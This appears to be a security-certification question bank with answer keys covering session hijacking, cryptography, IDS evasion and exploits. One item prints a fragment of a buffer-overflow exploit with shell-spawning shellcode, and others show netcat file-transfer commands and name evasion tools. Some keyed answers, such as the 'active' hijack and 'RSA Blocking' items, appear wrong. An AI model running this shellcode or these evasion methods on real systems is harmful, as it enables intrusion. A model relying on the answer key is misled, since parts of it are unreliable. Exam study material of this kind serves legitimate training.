590 Gerald is a Certified Ethical Hacker working for a large financial institution in Oklahoma City. Gerald is currently performing an annual security audit of the company's network. One of the company's primary concerns is how the corporate data is transferred back and forth from the banks all over the city to the data warehouse at the company's home office. To see what type of traffic is being passed back and forth and to see how secure that data really is, Gerald uses a session hijacking tool to intercept traffic between a server and a client. Gerald hijacks an HTML session between a client running a web application which connects to a SQL database at the home office. Gerald does not kill the client's session; he simply monitors the traffic that passes between it and the server. What type of session attack is Gerald employing here? A. He is utilizing a passive network level hijack to see the session traffic used to communicate between the two devices B. Gerald is using a passive application level hijack to monitor the client and server traffic C. This type of attack would be considered an active application attack since he is actively monitoring the traffic D. This type of hijacking attack is called an active network attack

C Explanation: Session Hijacking is an active attack

578 Stephanie works as a records clerk in a large office building in downtown Chicago. On Monday, she went to a mandatory security awareness class (Security5) put on by her company's IT department. During the class, the IT department informed all employees that everyone's Internet activity was thenceforth going to be monitored. Stephanie is worried that her Internet activity might give her supervisor reason to write her up, or worse get her fired. Stephanie's daily work duties only consume about four hours of her time, so she usually spends the rest of the day surfing the web. Stephanie really enjoys surfing the Internet but definitely does not want to get fired for it. What should Stephanie use so that she does not get in trouble for surfing the Internet? A. Cookie Disabler B. Stealth Anonymizer C. Stealth Firefox D. Stealth IE

C Explanation: Stealth Firefox: If there are times you want to surf the web without leaving a trace on your local computer, then this is the right extension for you. https://addons.mozilla.org/en-US/firefox/addon/1306

541 What is the number of bits SYSKEY uses for encryption? A. 40 B. 64 C. 128 D. 256

C Explanation: System Key hotfix is an optional feature which allows stronger encryption of SAM. Strong encryption protects private account information by encrypting the password data using a 128-bit cryptographically random key, known as a password encryption key.

559 Vulnerability mapping occurs after which phase of a penetration test? A. Host scanning B. Passive information gathering C. Analysis of host scanning D. Network level discovery

C Explanation: The order should be Passive information gathering, Network level discovery, Host scanning and Analysis of host scanning.

546 _____ is a type of symmetric-key encryption algorithm that transforms a fixed-length block of plaintext (unencrypted text) data into a block of ciphertext (encrypted text) data of the same length. A. Bit Cipher B. Hash Cipher C. Block Cipher D. Stream Cipher

C Explanation: A block cipher is a symmetric key cipher which operates on fixed-length groups of bits, termed blocks, with an unvarying transformation. When encrypting, a block cipher might take a (for example) 128-bit block of plaintext as input, and output a corresponding 128-bit block of ciphertext.

522 Bob has a good understanding of cryptography, having worked with it for many years. Cryptography is used to secure data from specific threats, but it does not secure the application from coding errors. It can provide data privacy and integrity and enable strong authentication, but it cannot mitigate programming errors. What is a good example of a programming error that Bob can use to illustrate to the management that encryption will not address all of their security concerns? A. Bob can explain that a random generator can be used to derive cryptographic keys but it uses a weak seed value and it is a form of programming error. B. Bob can explain that by using passwords to derive cryptographic keys it is a form of a programming error. C. Bob can explain that a buffer overflow is an example of programming error and it is a common mistake associated with poor programming technique. D. Bob can explain that by using a weak key management technique it is a form of programming error.

C Explanation: A buffer overflow occurs when you write a set of values (usually a string of characters) into a fixed length buffer and write at least one value outside that buffer's boundaries (usually past its end). A buffer overflow can occur when reading input from the user into a buffer, but it can also occur during other kinds of processing in a program. Technically, a buffer overflow is a problem with the program's internal implementation.

514 SSL has been seen as the solution to a lot of common security problems. Administrators will often make use of SSL to encrypt communications from Point A to Point B. Why do you think this could be a bad idea if there is an Intrusion Detection System deployed to monitor the traffic between Point A and Point B? A. SSL is redundant if you already have IDS's in place B. SSL will trigger rules at regular interval and force the administrator to turn them off C. SSL will make the content of the packet and Intrusion Detection System are blinded D. SSL will slow down the IDS while it is breaking the encryption to see the packet content

C Explanation: An IDS will not be able to evaluate the content in the packets if it is encrypted.

538 Symmetric encryption algorithms are known to be fast but present great challenges on the key management side. Asymmetric encryption algorithms are slow but allow communication with a remote host without having to transfer a key out of band or in person. If we combine the strength of both crypto systems where we use the symmetric algorithm to encrypt the bulk of the data and then use the asymmetric encryption system to encrypt the symmetric key, what would this type of usage be known as? A. Symmetric system B. Combined system C. Hybrid system D. Asymmetric system

C Explanation: Because of the complexity of the underlying problems, most public-key algorithms involve operations such as modular multiplication and exponentiation, which are much more computationally expensive than the techniques used in most block ciphers, especially with typical key sizes. As a result, public-key cryptosystems are commonly "hybrid" systems, in which a fast symmetric-key encryption algorithm is used for the message itself, while the relevant symmetric key is sent with the message, but encrypted using a public-key algorithm. Similarly, hybrid signature schemes are often used, in which a cryptographic hash function is computed, and only the resulting hash is digitally signed.

513 An Employee wants to bypass detection by a network-based IDS application and does not want to attack the system containing the IDS application. Which of the following strategies can the employee use to evade detection by the network based IDS application? A. Create a ping flood B. Create a SYN flood C. Create a covert network tunnel D. Create multiple false positives

C Explanation: HTTP Tunneling is a technique by which communications performed using various network protocols are encapsulated using the HTTP protocol, the network protocols in question usually belonging to the TCP/IP family of protocols. The HTTP protocol therefore acts as a wrapper for a covert channel that the network protocol being tunneled uses to communicate. The HTTP stream with its covert channel is termed an HTTP Tunnel. Very few firewalls block outgoing HTTP traffic.

530 Bob has a good understanding of cryptography, having worked with it for many years. Cryptography is used to secure data from specific threats, but it does not secure the application from coding errors. It can provide data privacy and integrity and enable strong authentication, but it can't mitigate programming errors. What is a good example of a programming error that Bob can use to explain to the management how encryption will not address all their security concerns? A. Bob can explain that using a weak key management technique is a form of programming error B. Bob can explain that using passwords to derive cryptographic keys is a form of a programming error C. Bob can explain that a buffer overflow is an example of programming error and it is a common mistake associated with poor programming technique D. Bob can explain that a random number generation can be used to derive cryptographic keys but it uses a weak seed value and this is a form of a programming error

C Explanation: In computer security and programming, a buffer overflow, or buffer overrun, is a programming error which may result in a memory access exception and program termination, or in the event of the user being malicious, a possible breach of system security.

545 How many bits encryption does SHA-1 use? A. 64 bits B. 128 bits C. 160 bits D. 256 bits

C Explanation: SHA-1 (as well as SHA-0) produces a 160-bit digest from a message with a maximum length of 2^64 - 1 bits, and is based on principles similar to those used by Professor Ronald L. Rivest of MIT in the design of the MD4 and MD5 message digest algorithms.

550 What is the difference between SSL and S-HTTP? A. SSL operates at the network layer and S-HTTP operates at the application layer B. SSL operates at the application layer and S-HTTP operates at the network layer C. SSL operates at transport layer and S-HTTP operates at the application layer D. SSL operates at the application layer and S-HTTP operates at the transport layer

C Explanation: Whereas SSL is designed to establish a secure connection between two computers, S-HTTP is designed to send individual messages securely. S-HTTP is defined in RFC 2660.

504 A program that defends against a port scanner will attempt to: A. Sends back bogus data to the port scanner B. Log a violation and recommend use of security-auditing tools C. Limit access by the scanning system to publicly available ports only D. Update a firewall rule in real time to prevent the port scan from being completed

D Explanation:

520 You have been using the msadc.pl attack script to execute arbitrary commands on an NT4 web server. While it is effective, you find it tedious to perform extended functions. On further research you come across a perl script that runs the following msadc functions: What kind of exploit is indicated by this script? A. A buffer overflow exploit. B. A SUID exploit. C. A SQL injection exploit. D. A chained exploit. E. A buffer under run exploit.

D Explanation:

529 Choose one of the following pseudo codes to describe this statement: If we have written 200 characters to the buffer variable, the stack should stop because it cannot hold any more data. A. If (I > 200) then exit (1) B. If (I < 200) then exit (1) C. If (I <= 200) then exit (1) D. If (I >= 200) then exit (1)

D Explanation:

544 Annie has just succeeded in stealing a secure cookie via a XSS attack. She is able to replay the cookie even while the session is valid on the server. Why do you think this is possible? A. Any cookie can be replayed irrespective of the session status B. The scenario is invalid as a secure cookie cannot be replayed C. It works because encryption is performed at the network layer (layer 1 encryption) D. It works because encryption is performed at the application layer (single encryption key)

D Explanation:

588 Darren is the network administrator for Greyson & Associates, a large law firm in Houston. Darren is responsible for all network functions as well as any digital forensics work that is needed. Darren is examining the firewall logs one morning and notices some unusual activity. He traces the activity target to one of the firm's internal file servers and finds that many documents on that server were destroyed. After performing some calculations, Darren finds the damage to be around $75,000 worth of lost data. Darren decides that this incident should be handled and resolved within the same day of its discovery. What incident level would this situation be classified as? A. This situation would be classified as a mid-level incident B. Since there was over $50,000 worth of loss, this would be considered a high-level incident C. Because Darren has determined that this issue needs to be addressed in the same day it was discovered, this would be considered a low-level incident D. This specific incident would be labeled as an immediate-level incident

D Explanation:

566 One of the better features of NetWare is the use of packet signature that includes cryptographic signatures. The packet signature mechanism has four levels from 0 to 3. In the list below which of the choices represent the level that forces NetWare to sign all packets? A. 0 (zero) B. 1 C. 2 D. 3

D Explanation: 0: Server does not sign packets (regardless of the client level). 1: Server signs packets if the client is capable of signing (client level is 2 or higher). 2: Server signs packets if the client is capable of signing (client level is 1 or higher). 3: Server signs packets and requires all clients to sign packets or logging in will fail.

592 Jason works in the sales and marketing department for a very large advertising agency located in Atlanta. Jason is working on a very important marketing campaign for his company's largest client. Before the project could be completed and implemented, a competing advertising company comes out with the exact same marketing materials and advertising, thus rendering all the work done for Jason's client unusable. Jason is questioned about this and says he has no idea how all the material ended up in the hands of a competitor. Without any proof, Jason's company cannot do anything except move on. After working on another high profile client for about a month, all the marketing and sales material again ends up in the hands of another competitor and is released to the public before Jason's company can finish the project. Once again, Jason says that he had nothing to do with it and does not know how this could have happened. Jason is given leave with pay until they can figure out what is going on. Jason's supervisor decides to go through his email and finds a number of emails that were sent to the competitors that ended up with the marketing material. The only items in the emails were attached jpg files, but nothing else. Jason's supervisor opens the picture files, but cannot find anything out of the ordinary with them. What technique has Jason most likely used? A. Stealth Rootkit Technique B. Snow Hiding Technique C. ADS Streams Technique D. Image Steganography Technique

D Explanation:

537 An attacker runs the netcat tool to transfer a secret file between two hosts. Machine A: netcat -l -p 1234 < secretfile Machine B: netcat 192.168.3.4 > 1234 He is worried about information being sniffed on the network. How would the attacker use netcat to encrypt information before transmitting it on the wire? A. Machine A: netcat -l -p -s password 1234 < testfile Machine B: netcat <machine A IP> 1234 B. Machine A: netcat -l -e magickey -p 1234 < testfile Machine B: netcat <machine A IP> 1234 C. Machine A: netcat -l -p 1234 < testfile -pw password Machine B: netcat <machine A IP> 1234 -pw password D. Use cryptcat instead of netcat.

D Explanation: Cryptcat is the standard netcat enhanced with Twofish encryption, with ports for Windows NT, BSD and Linux. Twofish is courtesy of Counterpane and Cryptix. A default netcat installation does not contain any cryptography support.

567 Which is the Novell Netware Packet signature level used to sign all packets ? A. 0 B. 1 C. 2 D. 3

D Explanation: Level 0 is no signature, Level 3 is communication using signature only.

594 Leonard is a systems administrator who has been tasked by his supervisor to slow down or lessen the amount of SPAM their company receives on a regular basis. SPAM being sent to company email addresses has become a large problem within the last year for them. Leonard starts by adding SPAM prevention software at the perimeter of the network. He then builds a black list, white list, turns on MX callbacks, and uses heuristics to stop the incoming SPAM. While these techniques help some, they do not prevent much of the SPAM from coming in. Leonard decides to use a technique where his mail server responds very slowly to outside connected mail servers by using multi-line SMTP responses. By responding slowly to SMTP connections, he hopes that SPAMMERS will see this and move on to easier and faster targets. What technique is Leonard trying to employ here to stop SPAM? A. To stop SPAM, Leonard is using the technique called Bayesian Content Filtering B. Leonard is trying to use the Transparent SMTP Proxy technique to stop incoming SPAM C. This technique that Leonard is trying is referred to as using a Sender Policy Framework to aid in SPAM prevention D. He is using the technique called teergrubing to delay SMTP responses and hopefully stop SPAM

D Explanation: Teergrubing FAQ. What does a UBE sender really need? What does he sell? A certain amount of sent E-Mails per minute. This product is called Unsolicited Bulk E-Mail. How can anyone hit a UBE sender? By destroying his working tools. What? E-Mail is sent using SMTP. For this purpose a TCP/IP connection to the MX host of the recipient is established. Usually a computer is able to hold about 65500 TCP/IP connections from/to a certain port. But in most cases it's a lot less due to limited resources. If it is possible to hold a mail connection open (i.e. several hours), the productivity of the UBE sending equipment is dramatically reduced. SMTP offers continuation lines to hold a connection open without running into timeouts. A teergrube is a modified MTA (mail transport agent) able to do this to specified senders. Incorrect answer: Sender Policy Framework (SPF) deals with allowing an organization to publish "Authorized" SMTP servers for their organization through DNS records.

575 You have installed antivirus software and you want to be sure that your AV signatures are working correctly. You don't want to risk the deliberate introduction of a live virus to test the AV software. You would like to write a harmless test virus, which is based on the European Institute for Computer Antivirus Research format that can be detected by the AV software. How should you proceed? A. Type the following code in notepad and save the file as SAMPLEVIRUS.COM. Your antivirus program springs into action whenever you attempt to open, run or copy it. X5O!P%@AP[4\PZX54(P^)7CC)7}$SAMPLEVIRUS-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* B. Type the following code in notepad and save the file as AVFILE.COM. Your antivirus program springs into action whenever you attempt to open, run or copy it. X5O!P%@AP[4\PZX54(P^)7CC)7}$AVFILE-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* C. Type the following code in notepad and save the file as TESTAV.COM. Your antivirus program springs into action whenever you attempt to open, run or copy it. X5O!P%@AP[4\PZX54(P^)7CC)7}$TESTAV-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* D. Type the following code in notepad and save the file as EICAR.COM. Your antivirus program springs into action whenever you attempt to open, run or copy it. X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

D Explanation: The EICAR test file (official name: EICAR Standard Anti-Virus Test File) is a file, developed by the European Institute for Computer Antivirus Research, to test the response of computer antivirus (AV) programs. The rationale behind it is to allow people, companies, and AV programmers to test their software without having to use a real computer virus that could cause actual damage should the AV not respond correctly. EICAR likens the use of a live virus to test AV software to setting a fire in a trashcan to test a fire alarm, and promotes the EICAR test file as a safe alternative.

581 Stephanie, a security analyst, has just returned from a Black Hat conference in Las Vegas where she learned of many powerful tools used by hackers and security professionals alike. Stephanie is primarily worried about her Windows network because of all the legacy computers and servers that she must use, due to lack of funding. Stephanie wrote down many of the tools she learned of in her notes and was particularly interested in one tool that could scan her network for vulnerabilities and return reports on her network's weak spots called SAINT. She remembered from her notes that SAINT is very flexible and can accomplish a number of tasks. Stephanie asks her supervisor, the CIO, if she can download and run SAINT on the network. Her boss said to not bother with it since it will not work for her at all. Why did Stephanie's boss say that SAINT would not work? A. SAINT only works on Macintosh-based machines B. SAINT is too expensive and is not cost effective C. SAINT is too network bandwidth intensive D. SAINT only works on LINUX and UNIX machines

D Explanation: Works with Unix/Linux/BSD and MacOS X http://www.saintcorporation.com/

501 Basically, there are two approaches to network intrusion detection: signature detection, and anomaly detection. The signature detection approach utilizes well-known signatures for network traffic to identify potentially malicious traffic. The anomaly detection approach utilizes a previous history of network traffic to search for patterns that are abnormal, which would indicate an intrusion. How can an attacker disguise his buffer overflow attack signature such that there is a greater probability of his attack going undetected by the IDS? A. He can use a shellcode that will perform a reverse telnet back to his machine B. He can use a dynamic return address to overwrite the correct value in the target machine computer memory C. He can chain NOOP instructions into a NOOP "sled" that advances the processor's instruction pointer to a random place of choice D. He can use polymorphic shell code - with a tool such as ADMmutate - to change the signature of his exploit as seen by a network IDS

D Explanation: ADMmutate uses a polymorphic technique designed to circumvent certain forms of signature-based intrusion detection. All network-based remote buffer overflow exploits have similarities in how they function. ADMmutate has the ability to emulate the protocol of the service the attacker is attempting to exploit. The data payload (sometimes referred to as an egg) contains the instructions the attacker wants to execute on the target machine. These eggs are generally interchangeable and can be utilized in many different buffer overflow exploits. ADMmutate uses several techniques to randomize the contents of the egg in any given buffer overflow exploit. This randomization effectively changes the content or 'signature' of the exploit without changing the functionality of the exploit.

572 Which of the following is NOT a valid NetWare access level? A. Not Logged in B. Logged in C. Console Access D. Administrator

D Explanation: Administrator is an account, not an access level.

543 Which of the following best describes session key creation in SSL? A. It is created by the server after verifying the user's identity B. It is created by the server upon connection by the client C. It is created by the client from the server's public key D. It is created by the client after verifying the server's identity

D Explanation: An SSL session always begins with an exchange of messages called the SSL handshake. The handshake allows the server to authenticate itself to the client using public-key techniques, then allows the client and the server to cooperate in the creation of symmetric keys used for rapid encryption, decryption, and tamper detection during the session that follows. Optionally, the handshake also allows the client to authenticate itself to the server.

503 John has a proxy server on his network which caches and filters web access. He shuts down all unnecessary ports and services. Additionally, he has installed a firewall (Cisco PIX) that will not allow users to connect to any outbound ports. Jack, a network user, has successfully connected to a remote server on port 80 using netcat. He could in turn drop a shell from the remote machine. Assuming an attacker wants to penetrate John's network, which of the following options is he likely to choose? A. Use ClosedVPN B. Use Monkey shell C. Use reverse shell using FTP protocol D. Use HTTPTunnel or Stunnel on port 80 and 443

D Explanation: As long as you allow HTTP or HTTPS traffic, attacks can be tunneled over those protocols with Stunnel or HTTPTunnel.

542 Which of the following is NOT true of cryptography? A. Science of protecting information by encoding it into an unreadable format B. Method of storing and transmitting data in a form that only those it is intended for can read and process C. Most (if not all) algorithms can be broken by both technical and non-technical means D. An effective way of protecting sensitive information in storage but not in transit

D Explanation: Cryptography protects data both in storage and in transit.

510 What is the purpose of firewalking? A. It's a technique used to discover wireless networks on foot B. It's a technique used to map routers on a network link C. It's a technique used to discover interfaces in promiscuous mode D. It's a technique used to discover what rules are configured on a gateway

D Explanation: Firewalking uses a traceroute-like IP packet analysis to determine whether or not a particular packet can pass from the attacker's host to a destination host through a packet-filtering device. This technique can be used to map 'open' or 'pass through' ports on a gateway. Moreover, it can determine whether packets with various control information can pass through a given gateway.

502 You are the security administrator for a large network. You want to prevent attackers from running any sort of traceroute into your DMZ and discovering the internal structure of publicly accessible areas of the network. How can you achieve this? A. Block TCP at the firewall B. Block UDP at the firewall C. Block ICMP at the firewall D. There is no way to completely block tracerouting into this area

D Explanation: If you create rules that prevent attackers from performing traceroutes to your DMZ, you will also prevent anyone from accessing the DMZ from outside the company network, and in that case it is not a DMZ you have.

516 Bob has set up three web servers on Windows Server 2003 IIS 6.0. Bob has followed all the recommendations for securing the operating system and IIS. These servers are going to run numerous e-commerce websites that are projected to bring in thousands of dollars a day. Bob is still concerned about the security of this server because of the potential for financial loss. Bob has asked his company's firewall administrator to set the firewall to inspect all incoming traffic on ports 80 and 443 to ensure that no malicious data is getting into the network. Why will this not be possible? A. Firewalls can't inspect traffic coming through port 443 B. Firewalls can only inspect outbound traffic C. Firewalls can't inspect traffic coming through port 80 D. Firewalls can't inspect traffic at all, they can only block or allow certain ports

D Explanation: In order to really inspect traffic and traffic patterns you need an IDS.

540 In the context of using PKI, when Sven wishes to send a secret message to Bob, he looks up Bob's public key in a directory, uses it to encrypt the message before sending it off. Bob then uses his private key to decrypt the message and reads it. No one listening in can decrypt the message. Anyone can send an encrypted message to Bob but only Bob can read it. Thus, although many people may know Bob's public key and use it to verify Bob's signature, they cannot discover Bob's private key and use it to forge digital signatures. What does this principle refer to? A. Irreversibility B. Non-repudiation C. Symmetry D. Asymmetry

D Explanation: PKI uses asymmetric key pair encryption. One key of the pair is the only way to decrypt data encrypted with the other.

555 Which of the following encryption algorithms is not based on a block cipher? A. DES B. Blowfish C. AES D. RC4

D Explanation: RC4 (also known as ARC4 or ARCFOUR) is the most widely-used software stream cipher and is used in popular protocols such as Secure Sockets Layer (SSL) (to protect Internet traffic) and WEP (to secure wireless networks).

Topic 22, Penetration Testing Methodologies

539 Steven the hacker realizes that the network administrator of the company is using syskey to protect organization resources in the Windows 2000 Server. Syskey independently encrypts the hashes so that physical access to the server, tapes, or ERDs is only the first step to cracking the passwords. Steven must break through the encryption used by syskey before he can attempt brute force dictionary attacks on the hashes. Steven runs a program called "SysCracker" targeting the Windows 2000 Server machine in attempting to crack the hash used by Syskey. He needs to configure the encryption level before he can launch the attack. How many bits does Syskey use for encryption? A. 40 bit B. 64 bit C. 256 bit D. 128 bit

D Explanation: SYSKEY is a utility that encrypts the hashed password information in a SAM database using a 128-bit encryption key.

564 Jim was having no luck performing a penetration test on his company's network. He was running the test from home and had downloaded every security scanner he could lay his hands on. Despite knowing the IP range of all of the systems and the exact network configuration, Jim was unable to get any useful results. Why is Jim having these problems? A. Security scanners can't perform vulnerability linkage B. Security Scanners are not designed to do testing through a firewall C. Security Scanners are only as smart as their database and can't find unpublished vulnerabilities D. All of the above

D Explanation: Security scanners are designed to find vulnerabilities but not to use them, and they will only find well-known vulnerabilities, not zero-day exploits. Therefore you can't use a security scanner for penetration testing but need a more powerful program.

560 Why would you consider sending an email to an address that you know does not exist within the company you are performing a Penetration Test for? A. To determine who is the holder of the root account B. To perform a DoS C. To create needless SPAM D. To elicit a response back that will reveal information about email servers and how they treat undeliverable mail E. To test for virus protection

D Explanation: Sending a bogus email is one way to find out more about internal servers. Also, to gather additional IP addresses and learn how they treat mail.

523 A buffer overflow occurs when a program or process tries to store more data in a buffer (temporary data storage area) than it was intended to hold. What is the most common cause of buffer overflow in software today? A. Bad permissions on files. B. High bandwidth and large number of users. C. Usage of non standard programming languages. D. Bad quality assurance on software produced.

D Explanation: Technically, a buffer overflow is a problem with the program's internal implementation.

506 Exhibit: Given the following extract from the snort log on a honeypot, what do you infer from the attack? A. A new port was opened B. A new user id was created C. The exploit was successful D. The exploit was not successful

D Explanation: The attacker submits a PASS to the honeypot and receives a login incorrect before disconnecting.

524 While investigating a claim of a user downloading illegal material, the investigator goes through the files on the suspect's workstation. He comes across a file that is called 'file.txt' but when he opens it, he finds the following: What does this file contain? A. A picture that has been renamed with a .txt extension. B. An encrypted file. C. A uuencoded file. D. A buffer overflow.

D Explanation: This is a buffer overflow exploit with its "payload" in hexadecimal format.

570 Pandora is used to attack __________ network operating systems. A. Windows B. UNIX C. Linux D. Netware E. MAC OS

D Explanation: While there are not many tools available to attack Netware, Pandora is one that can be used.

598 Steven is the senior network administrator for Onkton Incorporated, an oil well drilling company in Oklahoma City. Steven and his team of IT technicians are in charge of keeping inventory for the entire company; including computers, software, and oil well equipment. To keep track of everything, Steven has decided to use RFID tags on their entire inventory so they can be scanned with either a wireless scanner or a handheld scanner. These RFID tags hold as much information as possible about the equipment they are attached to. When Steven purchased these tags, he made sure they were as state of the art as possible. One feature he really liked was the ability to disable RFID tags if necessary. This comes in very handy when the company actually sells oil drilling equipment to other companies. All Steven has to do is disable the RFID tag on the sold equipment and it cannot give up any information that was previously stored on it. What technology allows Steven to disable the RFID tags once they are no longer needed? A. Newer RFID tags can be disabled by using Terminator Switches built into the chips B. RFID Kill Switches built into the chips enable Steven to disable them C. The company's RFID tags can be disabled by Steven using Replaceable ROM technology D. The technology used to disable an RFID chip after it is no longer needed, or possibly stolen, is called RSA Blocking

D Explanation: http://www.rsa.com/rsalabs/node.asp?id=2060

587 This is an authentication method that is used to prove that a party knows a password without transmitting the password in any recoverable form over a network. This authentication is secure because the password is never transmitted over the network, even in hashed form; only a random number and an encrypted random number are sent. A. Realm Authentication B. SSL Authentication C. Basic Form Authentication D. Cryptographic Authentication E. Challenge/Response Authentication

E Explanation: Challenge-Response Authentication The secure Challenge-Response Authentication Mechanism (CRAM-MD5) avoids passing a cleartext password over the network when you access your email account, ensuring that your login details cannot be captured and used by anyone in transit. http://www.neomailbox.com/component/content/article/212-hardware-token-authentication

526
#define MAKE_STR_FROM_RET(x) ((x)&0xff), (((x)&0xff00)>>8), (((x)&0xff0000)>>16), (((x)&0xff000000)>>24)
char infin_loop[]= /* for testing purposes */ "\xEB\xFE";
char bsdcode[] = /* Lam3rZ chroot() code rewritten for FreeBSD by venglin */
"\x31\xc0\x50\x50\x50\xb0\x7e\xcd\x80\x31\xdb\x31\xc0\x43"
"\x43\x53\x4b\x53\x53\xb0\x5a\xcd\x80\xeb\x77\x5e\x31\xc0"
"\x8d\x5e\x01\x88\x46\x04\x66\x68\xff\xff\x01\x53\x53\xb0"
"\x88\xcd\x80\x31\xc0\x8d\x5e\x01\x53\x53\xb0\x3d\xcd\x80"
"\x31\xc0\x31\xdb\x8d\x5e\x08\x89\x43\x02\x31\xc9\xfe\xc9"
"\x31\xc0\x8d\x5e\x08\x53\x53\xb0\x0c\xcd\x80\xfe\xc9\x75"
"\xf1\x31\xc0\x88\x46\x09\x8d\x5e\x08\x53\x53\xb0\x3d\xcd"
"\x80\xfe\x0e\xb0\x30\xfe\xc8\x88\x46\x04\x31\xc0\x88\x46"
"\x07\x89\x76\x08\x89\x46\x0c\x89\xf3\x8d\x4e\x08\x8d\x56"
"\x0c\x52\x51\x53\x53\xb0\x3b\xcd\x80\x31\xc0\x31\xdb\x53"
"\x53\xb0\x01\xcd\x80\xe8\x84\xff\xff\xff\xff\x01\xff\xff\x30"
"\x62\x69\x6e\x30\x73\x68\x31\x2e\x2e\x31\x31\x76\x65\x6e"
"\x67\x6c\x69\x6e";
static int magic[MAX_MAGIC],magic_d[MAX_MAGIC];
static char *magic_str=NULL;
int before_len=0;
char *target=NULL, *username="user", *password=NULL;
struct targets getit;
The following exploit code is extracted from what kind of attack? A. Remote password cracking attack B. SQL Injection C. Distributed Denial of Service D. Cross Site Scripting E. Buffer Overflow

E Explanation: This is a buffer overflow with its payload in hex format.
